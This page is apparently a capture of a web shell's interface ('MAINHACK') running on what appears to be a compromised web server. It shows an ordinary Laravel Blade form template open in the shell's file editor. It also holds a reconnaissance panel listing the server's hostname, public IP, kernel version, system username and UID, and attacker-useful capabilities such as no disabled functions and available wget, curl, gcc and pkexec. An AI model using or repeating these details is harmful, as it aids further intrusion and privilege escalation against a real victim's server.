[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: customfields.blade.php
@foreach($fields as $field) <div class="form-group row"> <!--text--> @if($field->customfields_datatype =='text') <label class="col-sm-12 col-lg-3 text-left control-label col-form-label {{ runtimeCustomFieldsRequiredCSS($field->customfields_required) }}"> {{ $field->customfields_title }}{{ runtimeCustomFieldsRequiredAsterix($field->customfields_required) }}</label> <div class="col-sm-12 col-lg-9"> <input type="text" class="form-control form-control-sm {{ $class_name_fix ?? ''}}a-custom-field" id="{{ $field->customfields_name }}" name="{{ $field->customfields_name }}" value="{{ $field->current_value ?? ''}}"> </div> @endif <!--paragraph--> @if($field->customfields_datatype =='paragraph') <label class="col-sm-12 text-left control-label col-form-label {{ runtimeCustomFieldsRequiredCSS($field->customfields_required) }}"> {{ $field->customfields_title }}{{ runtimeCustomFieldsRequiredAsterix($field->customfields_required) }}</label> <div class="col-sm-12"> <textarea class="form-control form-control-sm tinymce-textarea {{ $class_name_fix ?? ''}}a-custom-field" rows="5" name="{{ $field->customfields_name }}" id="{{ $field->customfields_name }}">{{ $field->current_value ?? ''}}</textarea> </div> @endif <!--number & decimal--> @if($field->customfields_datatype =='number' || $field->customfields_datatype =='decimal') <label class="col-sm-12 col-lg-3 text-left control-label col-form-label {{ runtimeCustomFieldsRequiredCSS($field->customfields_required) }}"> {{ $field->customfields_title }}{{ runtimeCustomFieldsRequiredAsterix($field->customfields_required) }}</label> <div class="col-sm-12 col-lg-9"> <input type="number" class="form-control form-control-sm {{ $class_name_fix ?? ''}}a-custom-field" id="{{ $field->customfields_name }}" name="{{ $field->customfields_name }}" value="{{ $field->current_value ?? ''}}"> </div> @endif <!--date--> @if($field->customfields_datatype =='date') <label class="col-sm-12 col-lg-3 text-left control-label col-form-label {{ runtimeCustomFieldsRequiredCSS($field->customfields_required) }}"> {{ $field->customfields_title }}{{ runtimeCustomFieldsRequiredAsterix($field->customfields_required) }}</label> <div class="col-sm-12 col-lg-9"> <input type="text" class="form-control form-control-sm pickadate {{ $class_name_fix ?? ''}}a-custom-field" name="{{ $field->customfields_name }}" value="{{ runtimeDatepickerDate($field->current_value ?? '') }}" autocomplete="off"> <input class="mysql-date" type="hidden" name="{{ $field->customfields_name }}" id="{{ $field->customfields_name }}" value="{{ $field->current_value ?? ''}}"> </div> @endif <!--dropdown--> @if($field->customfields_datatype =='dropdown') <label class="col-sm-12 col-lg-3 text-left control-label col-form-label {{ runtimeCustomFieldsRequiredCSS($field->customfields_required) }}"> {{ $field->customfields_title }}{{ runtimeCustomFieldsRequiredAsterix($field->customfields_required) }}</label> <div class="col-sm-12 col-lg-9"> <select class="select2-basic-with-search form-control form-control-sm select2-preselected {{ $class_name_fix ?? ''}}a-custom-field" id="{{ $field->customfields_name }}" name="{{ $field->customfields_name }}" data-preselected="{{ $field->current_value ?? ''}}"> <option value=""></option> {!! runtimeCustomFieldsJsonLists($field->customfields_datapayload) !!} </select> </div> @endif <!--checkbox--> @if($field->customfields_datatype =='checkbox') <label class="col-sm-12 col-lg-3 text-left control-label col-form-label {{ runtimeCustomFieldsRequiredCSS($field->customfields_required) }}"> {{ $field->customfields_title }}{{ runtimeCustomFieldsRequiredAsterix($field->customfields_required) }}</label> <div class="col-sm-12 col-lg-9"> <input type="checkbox" id="{{ $field->customfields_name }}" name="{{ $field->customfields_name }}" class="filled-in chk-col-light-blue {{ $class_name_fix ?? ''}}a-custom-field" {{ runtimePrechecked($field->current_value ?? '') }}> <label class="p-l-0" for="{{ $field->customfields_name }}"></label> </div> @endif </div> @endforeach
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.84 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002